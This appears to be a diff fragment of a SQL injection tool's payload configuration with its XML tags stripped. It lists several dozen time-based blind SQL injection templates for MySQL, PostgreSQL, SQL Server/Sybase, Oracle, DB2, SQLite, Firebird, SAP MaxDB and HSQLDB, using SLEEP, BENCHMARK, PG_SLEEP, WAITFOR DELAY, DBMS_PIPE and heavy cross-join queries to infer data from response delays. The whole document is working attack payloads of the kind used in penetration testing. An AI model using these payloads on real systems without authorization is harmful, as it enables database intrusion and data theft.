+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (SLEEP) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + AND SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) + + OR SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment) + 5 + 3 + 1 + 1,2,3,9 + 1 + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL < 5.0.12 AND time-based blind (BENCHMARK) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 OR time-based blind (BENCHMARK) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]) + + OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) + # + + + + +
+ MySQL + < 5.0.12 +
+
+ + + MySQL > 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind + 5 + 2 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP) + 5 + 3 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL AND time-based blind (ELT) + 5 + 3 + 1 + 1,2,3,8,9 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL + >= 5.0.12 +
+
+ + + MySQL OR time-based blind (ELT) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+
+ + + MySQL AND time-based blind (ELT - comment) + 5 + 5 + 1 + 1,2,3,9 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + + +
+ MySQL +
+
+ + + MySQL OR time-based blind (ELT - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + + +
+ MySQL +
+
+ + + PostgreSQL > 8.1 AND time-based blind + 5 + 1 + 1 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 OR time-based blind + 5 + 1 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 AND time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL > 8.1 OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) + -- + + + + +
+ PostgreSQL + > 8.1 +
+
+ + + PostgreSQL AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+
+ + + PostgreSQL OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) + -- + + + + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase time-based blind (IF) + 5 + 1 + 1 + 0 + 1 + IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + WAITFOR DELAY '0:0:[SLEEPTIME]' + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase time-based blind (IF - comment) + 5 + 4 + 1 + 0 + 1 + IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]' + + WAITFOR DELAY '0:0:[SLEEPTIME]' + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) + -- + + + + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle AND time-based blind + 5 + 1 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind + 5 + 1 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (comment) + 5 + 4 + 1 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + -- + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (comment) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) + + OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) + -- + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (heavy query) + 5 + 2 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (heavy query) + 5 + 2 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + + + + +
+ Oracle +
+
+ + + Oracle AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + -- + + + + +
+ Oracle +
+
+ + + Oracle OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) + + OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) + -- + + + + +
+ Oracle +
+
+ + + IBM DB2 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+
+ + + IBM DB2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])) + + OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3) + -- + + + + +
+ IBM DB2 +
+
+ + + SQLite > 2.0 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,8,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,9 + 1 + AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + SQLite > 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,9 + 1 + OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END) + + OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) + -- + + + + +
+ SQLite + > 2.0 +
+
+ + + Firebird >= 2.0 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,9 + 1 + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,9 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,9 + 1 + AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + Firebird >= 2.0 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,9 + 1 + OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4) + -- + + + + +
+ Firebird + >= 2.0 +
+
+ + + SAP MaxDB AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + -- + + + + +
+ SAP MaxDB +
+
+ + + SAP MaxDB OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3) + + OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3) + -- + + + + +
+ SAP MaxDB +
+
+ + + HSQLDB >= 1.7.2 AND time-based blind (heavy query) + 5 + 4 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 OR time-based blind (heavy query) + 5 + 4 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
+ + + HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END + + OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) + -- + + + + +
+ HSQLDB + >= 1.7.2 +
+
